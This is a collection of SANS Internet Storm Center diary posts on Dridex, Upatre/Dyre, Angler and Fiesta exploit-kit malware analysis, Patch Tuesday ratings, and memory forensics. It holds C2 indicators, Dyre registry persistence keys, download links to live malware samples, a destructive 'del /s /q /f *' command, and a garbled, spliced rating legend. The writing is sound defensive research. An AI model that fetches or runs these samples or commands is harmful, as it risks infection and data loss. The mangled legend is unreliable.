SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org
3 Comments
VENOM - Does it live up to the hype?
-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)
4 Comments
Another Maldoc? I'm Afraid So...
Guess what? Yep, there's yet another type of malicious document going around. Like last time, it's a MIME file with an MSO file containing an OLE file.

The sample (schro_193B11.xls 7F8C5E8B7157B04FA8E9CEEF13C28AB9) is an Excel spreadsheet saved as a MIME file:

But this time, the compressed data is at another position inside the MSO file:

So I updated my oledump tool (V0.0.16) to search for compressed data inside MSO files (in stead of looking at a fixed position 50).
The string encoding used in the VBA code is interesting. It is reminiscent of RC4:

I also updated my plugin plugin_dridex with this encoding:

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
3 Comments
Oh Bloat!
I recently installed a new printer. Windows didn't seem to know its driver, so I "had" to supply the CD-ROM that came with the printer. Of course, being a device driver, it asked for admin privileges to install. I went for custom install instead of full, but that option failed and crashed in EMET with a buffer overflow. Not a good omen. But since I wanted to print, I de-selected "custom" and went for "recommended". Yes, I'm naive at times. Apparently, all it takes to "p0wn" me is to ship me a printer together with a CD. [blush].
20 minutes later, I was the proud owner of FOUR pieces of software that have NOTHING to do with printing. What the [beep]! And to add insult to injury, TWO of the four pieces didn't show up in Add-Remove-Programs, and hence could not be "easily" evicted again. The most annoying piece was "isuspm", Acresso Software Manager. Completely getting rid of the four pieces of bloatware required use of Sysinternals "Autoruns", plus generous "del /s /q /f *" at the prompt, plus six! reboots. Yes, I probably could have reverted to a snapshot, but I kinda wanted to keep the printer driver itself.
Hello, dear printer vendors: Charge me 15$ more for the printer, if you must, but stop wasting my time un-installing all that [beeping] [beep]!
If you are in a similar situation, ignore whatever comes with the printer (especially the CD!), go to the web site of the printer manufacturer, and search for the device driver for the model at hand. Somewhat to my surprise, they offered an "expert" install that came without all the crud, and just included the driver. Now .. why can't this minimal installation also be on the CD? Why screw all the poor home users [and naive ISC handlers :)] for no good reason except to make five measly dollars on the side??
8 Comments
Recent Dridex activity
Introduction
Botnet-based Dridex malspam is like the Energizer Bunny. It just won't quit. We see it almost every day.
Since last year, botnet hosts pushing Dridex have been using macros in Microsoft Word documents or Excel spreadsheets to deliver the malware [1]. These files are most often attachments in malicious spam (malspam).
Dridex traffic has evolved somewhat since I last blogged about it [2]. For this diary, we'll look at a wave from Tuesday, 2015-05-12 as described on the Dynamoo Blog [3]. I saw a few of these messages while reviewing emails blocked by my employer's spam filters. Let's take a closer look...
Email Example
Nothing really ground-breaking here. In this wave, hosts associated with Dridex malspam used the recipient as part of the name for the malicious attachment, but we've seen this before.
Traffic Generated by the Malware
I infected a host by running the Excel spreadsheet and enabling macros. Reviewing the traffic with Security Onion revealed several info and policy events. It also alerted for likely Dridexs cert in the SSL traffic.
A pcap of the traffic is available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-traffic.pcap
Below is a list of HTTP GET requests and other indicators of compromise (IOCs) associated noted in the pcap file:
- 141.101.112.16 port 80 - pastebin.com - GET /download.php?i=5K5YLjVu
- 92.63.88.87 port 8080 - 92.63.88.87:8080 - GET /bt/get.php
- 5.9.44.37 port 80 - savepic.org - GET /7257790.jpg
- 14.98.183.4 port 443 - TLS traffic
- 31.24.30.65 port 443 - TLS traffic
- 46.36.217.227 port 3443 - TLS traffic
- 75.145.133.5 port 443 - TLS traffic
- 82.112.185.104 port 8000 - TLS traffic
- 87.117.229.29 port 443 - TLS traffic
- 144.76.109.82 port 443 - TLS traffic
- 45.55.154.235 port 80 - encrypted traffic
- 79.149.254.3 port 80 - encrypted traffic / TLS traffic
- 27.60.164.164 port 443 - SYN packet only (no response)
- 65.51.130.39 port 443 - SYN packet only (no response)
- 82.17.98.133 port 443 - SYN packet only (no response)
- 89.228.50.77 port 1443 - SYN packet only (no response)
- 95.163.121.215 port 80 - SYN packet only (no response)
- 131.111.216.180 port 443 - SYN packet only (no response)
Screenshots from the Traffic
After enabling macros for the malicious Excel spreadsheet, the host called for a visual basic script (VBS) file from pastebin:
The VBS file generated an HTTP GET request to download a Windows executable file (the Dridex malware):
Shortly after that, a small JPG image was downloaded by the infected host:
Dridex activity included SSL traffic to various IP addresses, mostly with example.com SSL certificates. I also noted an SSL certificate for example.net as shown below:
SSL traffic happened on various TCP ports, including port 80:
Malware
People have submitted the Windows executable to various public sites for malware analysis:
- https://www.virustotal.com/en/file/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8/analysis/
- https://malwr.com/analysis/ZmQzM2E1ZThmOWZhNDQzM2FkNzM1NGE3YTlkODU1ZjM/
- https://www.hybrid-analysis.com/sample/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8?environmentId=1
- https://www.hybrid-analysis.com/sample/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8?environmentId=2
- https://www.hybrid-analysis.com/sample/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8?environmentId=4
A zip archive of the malware is also available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-malware.zip
The zip file is password-protected with the standard password. If you don't know it, email me at [email protected] and ask.
Final Notes
The last time I looked into Dridex traffic, I saw a lot of post-infection HTTP GET requests over port 80. In this example, the post-infection traffic was mainly SSL or otherwise encrypted. Can't wait to see what Dridex has in store for us next!
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://researchcenter.paloaltonetworks.com/2015/01/dridex-banking-trojan-begins-2015-bang/
[2] http://www.malware-traffic-analysis.net/2015/04/15/index.html
[3] http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html
10 Comments
May 2015 Microsoft Patch Tuesday Summary
Overview of the May 2015 Microsoft patches and their status.
| # | Affected | Contra Indications - KB | Known Exploits | Microsoft rating(**) | ISC rating(*) | |
|---|---|---|---|---|---|---|
| clients | servers | |||||
| MS15-043 | Cumulative Security Update for Internet Explorer (Replaces MS15-032 ) | |||||
| CVE-2015-1658, CVE-2015-1684, CVE-2015-1685, CVE-2015-1686, CVE-2015-1688, CVE-2015-1689, CVE-2015-1691, CVE-2015-1692, CVE-2015-1694, CVE-2015-1703, CVE-2015-1704, CVE-2015-1705, CVE-2015-1706, CVE-2015-1708, CVE-2015-1709, CVE-2015-1710, CVE-2015-1711, CVE-2015-1712, CVE-2015-1713, CVE-2015-1714, CVE-2015-1717, CVE-2015-1718 | KB 3049563 | . | Severity:Critical Exploitability: 1 | Critical | Critical | |
| MS15-044 | Vulnerabilities in Microsoft Font Drivers Could Allow Remote Code Execution (ReplacesMS13-034 MS13-082 MS15-023 ) | |||||
| CVE-2015-1670 CVE-2015-1671 | KB 3057110 | . | Severity:Critical Exploitability: 1 | Critical | Critical | |
| MS15-045 | Vulnerability in Windows Journal Could Allow Remote Code Execution (Replaces MS14-038 ) | |||||
| CVE-2015-1675 CVE-2015-1695 CVE-2015-1696 CVE-2015-1697 CVE-2015-1698 CVE-2015-1699 | KB 3046002 | . | Severity:Critical Exploitability: 2 | Critical | Critical | |
| MS15-046 | Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (ReplacesMS13-085 MS15-012 MS15-022 MS15-033 ) | |||||
| CVE-2015-1682 CVE-2015-1683 | KB 3057181 | . | Severity:Important Exploitability: 1 | Critical | Important | |
| MS15-047 | Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution (Replaces MS12-066 MS15-022 ) | |||||
| CVE-2015-1700 | KB 3058083 | . | Severity:Important Exploitability: 2 | Important | Critical | |
| MS15-048 | Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (Replaces MS12-038 MS13-015 MS13-040 MS13-082 MS14-009 ) | |||||
| CVE-2015-1672 CVE-2015-1673 | KB 3057134 | . | Severity:Important Exploitability: 3 | Important | Important | |
| MS15-049 | Vulnerability in Silverlight Could Allow Elevation of Privilege (Replaces MS14-014 ) | |||||
| CVE-2015-1715 | KB 3058985 | . | Severity:Important Exploitability: 2 | Important | Important | |
| MS15-050 | Vulnerability in Service Control Manager Could Allow Elevation of Privilege | |||||
| CVE-2015-1702 | KB 3055642 | . | Severity:Important Exploitability: 2 | Important | Important | |
| MS15-051 | Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (ReplacesMS15-023 ) | |||||
| CVE-2015-1676 CVE-2015-1677 CVE-2015-1678 CVE-2015-1679 CVE-2015-1680 CVE-2015-1701 | KB 3057191 | vuln. public. | Severity:Important Exploitability: 0 | Important | Important | |
| MS15-052 | Vulnerability in Windows Kernel Could Allow Security Feature Bypass (Replaces MS15-010 ) | |||||
| CVE-2015-1674 | KB 3050514 | . | Severity:Important Exploitability: 2 | Important | Important | |
| MS15-053 | Vulnerabilities in JScript and VBScript Scripting Engines Could Allow Security Feature Bypass (ReplacesMS11-031 MS12-056 ) | |||||
| CVE-2015-1684 CVE-2015-1686 | KB 3057263 | . | Severity:Important Exploitability: 2 | Important | Important | |
| MS15-054 | Vulnerability in Microsoft Management Console File Format Could Allow Denial of Service | |||||
| CVE-2015-1681 | KB 3051768 | . | Severity:Important Exploitability: 2 | Important | Important | |
| MS15-055 | Vulnerability in Schannel Could Allow Information Disclosure (ReplacesMS15-031 ) | |||||
| CVE-2015-1716 | KB 3061518 | . | Severity:Important Exploitability: 1 | Important | Important | |
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
	- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urt practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.
		
 
4 Comments
Angler exploit kit pushes new variant of ransomware
Introduction
The Angler exploit kit (EK) is being used to push a new variant of TeslaCrypt/AlphaCrypt ransomware. I've been documenting cases of Angler EK pushing AlphaCrypt in recent weeks [1][2][3]. Last week on 2015-05-07, I started seeing a new variant [4]. This new variant has a popup window that uses CTB-Locker-style instructions.
As seen below, this variant doesn't provide a name for itself in the decrypt instructions.
The same malware sample used a different bitcoin address for each host it infected.
Traffic Characteristics of this New Ransomware Variant
The traffic appears identical to what we've seen with previous infections from TeslaCrypt and AlphaCrypt. A few hours ago I infected a host from a site using Angler EK and received similar alerts from the network traffic.

Shown above:  Alerts from monitoring the infection with Security Onion.

Shown above:  HTTP traffic from the infection.  Click on the image to see it full-size.
A sample of the ransomware can be found at: 
https://malwr.com/analysis/MjE3ODRlYzc1MmQ2NGUyNDkyYWNkNWM0OWZiOGVjYzE/
I infected 4 different hosts with Angler EK in a 5-hour timeframe and received the same ransomware. It was the same file with the same hash each time. However, the bitcoin address for the ransom payment was different for each infected host. Shown below are decrypt pages from the other 3 hosts:
Here are the bitcoin addresses from these infected hosts:
- 14ctiiDNPLNh2YqmHFaPexAasi6vL5cqKX
- 1K23HDxnozzdfnzgmLeGGUkwyqpPmucnQS
- 1KcYaNQFsSm5hPX36Y855jsjceazoB3MXZ
- 1QJmYhyBWrjCDqvYmk6hh4drpX7NN7TVxq
Pcap files of the infection traffic (Angler EK and the post-infection) are available at:
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-01.pcap
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-02.pcap
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-03.pcap
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-04.pcap
Final Words
From what I can tell, TeslaCrypt and AlphaCrypt are very similar to CryptoLocker. This new, unnamed variant appears to be another evolution from this family of ransomware.
I've been seeing a lot of Angler EK lately. In recent weeks, more often than not, it's been pushing ransomware. Since 2015-05-07, I've only seen this new variant.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://malware-traffic-analysis.net/2015/04/30/index.html
[2] http://malware-traffic-analysis.net/2015/05/06/index.html
[3] http://malware-traffic-analysis.net/2015/05/07/index.html
[4] http://malware-traffic-analysis.net/2015/05/07/index2.html
2 Comments
SOC Analyst Pyramid
Introduction
Last weekend, I did a 10 minute fireside chat during lunch at BSidesSATX 2015 [1]. It was an informal presentation, where I discussed some of the issues facing security analysts working at an organization's Security Operations Center (SOC).
With only 10 minutes, the largest part of that presentation covered a "SOC analyst pyramid" of activity any organization will encounter.
For the presentation, security analysts are defined as people who monitor their organization's network for near-real-time detection of malicious activity. Security analysts review alerts from their organization's intrusion detection systems (IDS) or security information and event management (SIEM) appliances. These alerts are based on various sources, such as network traffic and event logs.
SOC Analyst Pyramid
Below is a visual representation of this pyramid:
As seen in the image above, the pyramid from top to bottom reads:
- Targeted attacks
- Malicious activity - not blocked
- Malicious activity - blocked or not applicable
- False positives or non-threat
Base of the SOC Analyst Pyramid
The base of the SOC analyst pyramid consists of false positives or valid activity unique to your organization's network. In my years as an analyst, investigating this activity took up the majority of my time. At times, you'll need to document why an alert triggers a false positive, so it can be filtered and allow the team to focus on real suspicious activity.
In my experience, no matter how well-tuned your security monitoring system is, analysts spend most of their time at this level of the pyramid.
Next Tier: Malicious Activity - Blocked or Not Applicable
The next level involves malicious activity that's either blocked or not applicable. Blocked activity includes spam with malware attachments (malspam) blocked by your organization's spam filters. Non-applicable activity includes certain types of scanning. The intent is malicious, but the scans are blind and not applicable to the targeted host. For example, here's a short list of activity from the error logs of a server I run:
That server doesn't run WordPress, nor does it have any sort of web-based administrative login, but I'll find WordPress-based scans hitting the server's IP every day. That shows malicious intent, but it's not applicable.
SOC analysts worried about near-real-time detection of malicious activity generally don't spend much time with this tier of the pyramid.
Next Tier: Malicious Activity - Not Blocked
The next tier of the pyramid involves malicious activity that somehow makes it past your organization's various security measures. This level includes drive-by infections from an exploit kit after viewing a compromised website. Depending on your organization's policies, adware might be an issue. Resolving issues involving adware or potentially unwanted programs (PUP) might give SOC personnel practice for resolving hosts infected with actual malware. Just make sure analysts don't focus on the adware/PUP. The focus of a SOC should always be on malicious activity.
This level of the pyramid is where analysts develop their skill in recognizing malicious activity. Exploit kit traffic might not infect a user's computer. SOC personnel should be able to examine this sort of malicious traffic and determine if a host actually became infected. After an alert, I've seen too many people assume a host was infected without digging in deeper to see what actually happened.
Malware or compromised hosts found at this level of the pyramid are not targeted. This type of malicious activity is a concern for any organization. It's not limited to your employer.
Top of the Pyramid: Targeted Attacks
This tier is where a SOC proves its value to an organization. If bad actors, criminal groups, or hostile foreign agents gain a foothold in your organization's infrastructure, you might not be able to get rid of them. Detecting intrusions early and preventing these bad actors from further access is extremely important. Any number of sources will tell you data breaches are not a matter of "if" but "when" [2][3][4].
Targeted attacks include spear phishing attempts to gather login credentials from specific members. Personnel using a chat system for sales or support can also be targeted. Denial of Service (DoS) attacks or Distributed DoS (DDoS) attacks are usually at this tier. Watering hole attacks [5] are also an issue.
Final Words
I've been a SOC analyst for two employers: one was the government, and the other is private sector. In both cases, I believe the SOC analyst pyramid applies. Feel free to leave a comment, if you have any opinions on the matter.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://www.securitybsides.com/w/page/91978878/BSidesSATX_2015
[2] http://www.securityinfowatch.com/article/12052877/preparing-for-your-companys-inevitable-data-breach
[3] http://www.maslon.com/webfiles/Emails_2015/LegalAlerts/2015_LegalAlert_CyberSecurity_DataBreach_webversion.html
[4] http://www.hechtins.com/blog/data_breach--not_if_but_when.aspx
[5] http://www.trendmicro.com.au/vinfo/au/threat-encyclopedia/web-attack/137/watering-hole-101
11 Comments
Wireshark TCP Flags: How To Install On Windows Video
I was asked how to install on Windows the Wireshark TCP Flags dissector I wrote about in a diary entry a month ago.
To help these persons, I made a video.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
0 Comments
Malicious Word Document: This Time The Maldoc Is A MIME File
Bart Blaze Tweeted me a malicious Word document sample (MD5 23a2d596d927ceab01918cc1dfd5db68) that can not be analyzed with my oledump tool. It turns out to be a MIME file that contains a MSO file, that in turn contains an OLE file. We've seen MSO files containing OLE files when we talked about XML Office documents. I've updated my oledump tool (V0.0.15) to handle MSO files directly.
Bart has a blogpost explaining several methods to analyze this file.
If you want to use oledump, first you extract the MSO file from the MIME file, and then you use oledump. If you don't have a tool to handle MIME files, I have one: emldump.py.
Here you can see emldump and oledump piped together to analyze the maldoc:

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
0 Comments
Security Awareness? How do you keep your staff safe?
If you’ve been following recent diaries from my fellow handlers Brad and Manuel, they peel the covers back on a couple current malicious emails campaigns. Many of the readers of the Storm Center diaries will be use to the ebb and flow of these stories. Here in Australia there’s a speeding fine scam email [1] that’s been running for the last few weeks, and there’s no indication it will drop off any time soon.
There is plenty of training, education and horror stories out on the Internet about malicious email, so why is it a recurring problem? One suggestion has been that it plays on human emotions. Threatening or enticing emails are designed to draw in the unsuspecting and then there are those users that will go to significant lengths to bypass security controls just to see the dancing cat/chicken/Hans Solo.
So providing useful and meaningful security awareness isn’t easy and has to be made relevant to individual audiences, even within the same organization. Providing the same training education to senior management and then a development group will probably miss the mark for both groups and result in a “Meh, I won’t fall for that”. Sadly generic security training often results in a trained staff member that still falls victim to a relatively convincing scam.
At this point you’d be expecting some wondrous solution. Sorry, not today. I will say this is something that takes constant revising, effort and innovative thinking to engage your staff. I’ve mentioned before that SANS has some nifty resources [2], but I really love finding how people try to instill security in their organizations. A security engineer from Riot Games posted how his security team took a different approach to getting in the hearts and minds of their staff about thinking about security as a whole [3]. This goes back to build a story about being security minded that your audience understands, hopefully cares about, and starts to adopt in their working practices and lives.
Will it stop everyone clicking links or opening random email attachments? I doubt it, but flipping a person from an attack vector to an attack alerter is a worthy goal.
If you have any other examples of innovative ways at getting people to care about good, basic security approaches, please add a comment or drop us a line [4]
[1] https://www.service.nsw.gov.au/news/afp-warns-public-email-traffic-infringement-scam
[2] http://www.securingthehuman.org/resources/
[3] http://blog.markofu.com/2015/01/socialising-security-riot.html
[4] https://isc.sans.edu/contact.html
Chris Mohan --- Internet Storm Center Handler on Duty
8 Comments
The Art of Logging
[This is a Guest Diary by Xavier Mertens]
Handling log files is not a new topic. For a long time, people should know that taking care of your logs is a must have. They are very valuable when you need to investigate an incident. But, if collecting events and storing them for later processing is one point, events must be properly generated to be able to investigate suspicious activities! Let's take by example a firewall... Logging all the accepted traffic is one step but what's really important is to log all the rejected traffic. Most of the modern security devices (IDS, firewalls, web application firewalls, ...) can integrate dynamic blocklists maintained by external organizations. They are plenty of useful blocklists on the internet with IP addresses, domain names, etc... It's quite easy to add a rule on top of your security policy which says:
if (source_ip in blocklist):
   drop_traffic()
With the "blocklist" table being populated by an external process. Usually, this rule is defined at the beginning of the security policy for performance reason. Very efficient, but is it the right place?
Let's assume a web application firewall which has this kind of feature. It will drop all connections from a (reported as) suspicious IP address from the beginning without more details. Let's put the blocklist rule at the end of the policy of our WAF. We have now something like this:
if (detected_attack(pattern1)):
   drop_traffic()
elif (detected_attack(pattern2)):
  drop_traffic()
elif (detected_attack(pattern3)):
 drop_traffic()
elif  (source_ip in blocklist):
 drop_traffic()
If we block the malicious IP addresses at the beginning of the policy, we'll never know which kind of attack has been tried. By blocking our malicious IP addresses at the end, we know that if one IP is blocked, our policy was not effective enough to block the attack! Maybe a new type of attack was tried and we need to add a new pattern. Blocking attackers is good but it's more valuable to know why they were blocked…
1 Comments
Upatre/Dyre - the daily grind of botnet-based malspam
Malicious spam (malspam) delivering Upatre/Dyre has been an ongoing issue for quite some time. Many organizations have posted articles about this malware. I've read good information on Dyre last year [1, 2] and this year [3].
Upatre is the malware downloader that retrieves Dyre (Dyreza), an information stealer described as a "Zeus-like banking Trojan" [4]. Earlier this year, EmergingThreats reported Upatre and Dyre are under constant development [5], while SecureWorks told us banking botnets continue to deliver this malspam despite previous takedowns [6].
Botnets sending waves of malspam with Upatre as zip file attachments are a near-daily occurrence. Most organizations won't see these emails, because the messages are almost always blocked by spam filters.
Because security researchers find Upatre/Dyre malspam nearly every day, it's a bit tiresome to write about, and we sometimes gloss over the information when it comes our way. After all, the malspam is being blocked, right?
Nonetheless, we should continue to document some waves of Upatre/Dyre malspam to see if anything is changing or evolving.
Here's one wave we found after searching through our blocked spam filters at Rackspace within the past 24 hours:
- Start date/time: 2015-05-04 13:48 UTC
- End date/time: 2015-05-04 16:40 UTC
- Timespan: 2 hours and 52 minutes
- Number of emails: 212
We searched for subject lines starting with the word "Holded" and found 31 different subjects:
- Holded account alert
- Holded account caution
- Holded account message
- Holded account notification
- Holded account report
- Holded account warning
- Holded bank operation alert
- Holded bank operation caution
- Holded bank operation message
- Holded bank operation notification
- Holded bank operation report
- Holded bank operation warning
- Holded operation alert
- Holded operation caution
- Holded operation message
- Holded operation notification
- Holded operation report
- Holded operation warning
- Holded payment alert
- Holded payment caution
- Holded payment message
- Holded payment notification
- Holded payment report
- Holded payment warning
- Holded transaction alert
- Holded transaction caution
- Holded transaction message
- Holded transaction notification
- Holded transaction report
- Holded transaction warning
The 212 messages had different attachments. Here's a small sampling of the different file names:
- abrogation_warning_information.zip
- block_alert_data.zip
- block_alert_document.zip
- block_alert_report.zip
- block_message_data.zip
- block_message_statement.zip
- cancelation_notification_data.zip
- cancelation_notification_details.zip
- invalidation_notification_details.zip
- invalidation_notification_document.zip
- nullfication_alert_report.zip
- nullfication_message_information.zip
- rejection_message_data.zip
- rejection_notification_details.zip
- rejection_warning_details.zip
- rejection_warning_report.zip
Emails sent by this botnet came from different IP addresses before they hit our mail servers. Senders and message ID headers were all spoofed. Each of the email headers show the same Google IP address spoofed as the previous sender. In the images below, the source IP address--right before the message hit our email servers--is outlined in red. The spoofed Google IP address is highlighted in blue. The only true items are the IP addresses before these emails hit our mail servers. Everything else is cannot be verified and can be considered fake.
This wave sent dozens of different attachment names with hundreds of different file hashes. I took a random sample and infected a host to generate some traffic. This Dyre malware is VM-aware, so I had to use a physical host for the infection traffic. It shows the usual Upatre URLs, Dyre SSL certs and STUN traffic we've seen beffore with Upatre/Dyre.

Shown above: Filtered Wireshark display of the pcap showing the infection traffic.

Shown above: EmergingThreats-based Snort events on the infection traffic using Security Onion.
Of note, icanhazip.com is a service run by one of my fellow Rackspace employees [7]. By itself, it's not malicious. icanhazip.com is merely a free service that reports your host's IP address. Unfortunately, malware authors use this and similar services to check an infected computer's IP address. Because of that, you'll often find alerts that report any traffic to these domains as an indicator of compromise (IOC).
The Upatre HTTP GET requests didn't return anything. Apparently, the follow-up Dyre malware was downloaded over one of the SSL connections. Here's what I grabbed off the infected host:
Dyre first saved to:  C:\Users\username\AppData\Local\Temp\vwlsrAgtqYXVcRW.exe
Dyre was then moved to:  C:\Windows\vwlsrAgtqYXVcRW.exe
Registry keys for persistence:
Key name: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\googleupdate
Key name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\googleupdate
Value name: ImagePath
Value type: REG_EXPAND_SZ
Value data: C:\Windows\vwlsrAgtqYXVcRW.exe
A pcap of the infection traffic is available at:
http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-traffic.pcap.zip
A zip file of the associated Upatre/Dyre sample is available at:
http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-malware-sample.zip
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
Final words
It's a daily grind reviewing this information, and most security professionals have higher priority issues to deal with. However, if we don't periodically review these waves of Upatre/Dyre, our front-line analysts and other security personnel might not recognize the traffic and may miss the IOCs.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] https://www.us-cert.gov/ncas/alerts/TA14-300A
[2] http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
[3] http://securityintelligence.com/dyre-wolf/
[4] http://www.networkworld.com/article/2878966/microsoft-subnet/dyre-banking-trojan-tweaked-to-spread-upatre-malware-via-microsoft-outlook.html
[5] http://www.emergingthreats.net/about-us/blog/dyre-upatre-constant-development
[6] http://www.secureworks.com/cyber-threat-intelligence/threats/banking-botnets-persist-despite-takedowns/
[7] https://major.io/icanhazip-com-faq
3 Comments
Traffic pattern change noted in Fiesta exploit kit
A few hours ago, Jerome Segura, Senior Security Researcher at Malwarebytes, tweeted about a change in traffic patterns from Fiesta exploit kit (EK) [1].
What had been semi-colons in the URLs from Fiesta EK are now commas. Here's what we saw from my previous diary on Fiesta EK last week [2]:
Here's what I saw from infecting a host with Fiesta EK a short while ago:
Any signatures for detecting Fiesta EK that depend on those semi-colons will need to be updated.
A pcap of the traffic is available at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-traffic.pcap.zip, and a zip file of the associated malware is at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-malware.zip
The ZIP file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
I checked out the payload from this infection, and it has a digital signature spoofing Microsoft.
Didn't get any traffic out of the malware payload from publicly-available malware analysis tools:
- https://malwr.com/analysis/MzQzYzNlMTQ0ODEzNDNjZmJjOTJhYjJjYTg2MmI2Yzc/
- https://www.hybrid-analysis.com/sample/67a3a6a3924e7e013b888350e1ff106faf665ccd191d21cb6b19b235e83d2aa5?environmentId=1 (Win 7 32-bit)
- https://www.hybrid-analysis.com/sample/67a3a6a3924e7e013b888350e1ff106faf665ccd191d21cb6b19b235e83d2aa5?environmentId=2 (Win 7 64-bit)
While generating traffic for my previous diary on Fiesta EK, I saw 3 different payloads within a 2 hour period. Every once in a while, I've seen digital signatures from Fiesta EK malware payloads, but I'm not sure what this particular payload is. Haven't really had time to analyze it. If anyone does have time, please leave a comment.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] https://twitter.com/jeromesegura/status/595002036027985921
[2] https://isc.sans.edu/diary/Actor+using+Fiesta+exploit+kit/19631
0 Comments
VolDiff, for memory image differential analysis
VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution providing a differential analysis, helping identify IOCs and understand advanced malware behaviour. 
I had intended to include it in my latest toolsmith article, Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem, but quite literally ran out of space and time. 
Using WinPmem, as part of Rekall and GRR offerings, you can acquire two memory images, one clean image prior to infection or compromise, and one after buggering your target system.
As you'll note in the article, I compromised a Windows 7 x64 SP1 VM with a PowerShell one-two punch, the vast majority of which occurred in-memory only. While documenting the related activities for the column, I also took before and after images for VolDiff testing as follows:
winpmem_1.6.2.exe baseline.raw, and after pwnzorship, winpmem_1.6.2.exe compromised.raw.
I then ran ./VolDiff.sh baseline.raw compromised.raw Win7SP1x64 on my Ubuntu server and bingo, after much time and ado (VolDiff takes a while to be sure), out popped VolDiff-report.txt.
To summarize briefly from the article, the malfeasance I unleashed against that poor, unsuspecting VM was all executed in the context of powershell.exe. To that end, did the VolDiff results corroborate the findings achieved with Rekall? Absolutely! Note that the suspicious PIDs from the article are 1284 and 2396. You'll spot them prominently in the following snippets of affirmation:
| |  / /___  / / __ \(_) __/ __/
| | / / __ \/ / / / / / /_/ /_  
| |/ / /_/ / / /_/ / / __/ __/  
|___/\____/_/_____/_/_/ /_/     
Volatility analysis report generated by VolDiff v0.9.3.
Download the latest version from https://github.com/aim4r/VolDiff/.
Suspicious new netscan entries
===========================================================================
0x13c8993d0        UDPv4    0.0.0.0:0    *:*                                   2396     powershell.exe 2015-04-26 17:56:08 UTC+0000
0x13e81acb0        UDPv4    0.0.0.0:0    *:*                                   1284     powershell.exe 2015-04-26 18:17:33 UTC+0000
Suspicious new pslist entries
===========================================================================
0xfffffa8031da1400 cmd.exe                1676   2396      0 --------      1      0 2015-04-26 18:11:52 UTC+0000   2015-04-26 18:15:50 UTC+0000  
0xfffffa8033b17060 powershell.exe         2604   1676      5      250      1      1 2015-04-26 18:12:58 UTC+0000  
0xfffffa80322c2060 cmd.exe                2912   1284      0 --------      1      0 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0xfffffa8032407460 powershell.exe         1984   2912      6      235      1      0 2015-04-26 19:18:20 UTC+0000                                 
Suspicious new psscan entries
===========================================================================
0x000000013eac2060 cmd.exe            2912   1284 0x0000000055564000 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                                 
0x000000013f6a8060 cmd.exe            2288   1284 0x000000006dd6f000 2015-04-26 19:19:44 UTC+0000   2015-04-26 19:55:20 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                
Suspicious new ldrmodules entries
===========================================================================
 1284 powershell.exe       0x000000006df70000 False  False  False \Windows\SysWOW64\schannel.dll
 2396 powershell.exe       0x000000006e010000 False  False  False \Windows\SysWOW64\credssp.dll
 
Suspicious new executables
===========================================================================
powershell
Suspicious new malfind entries
===========================================================================
Process: powershell.exe Pid: 2396 Address: 0x6400000
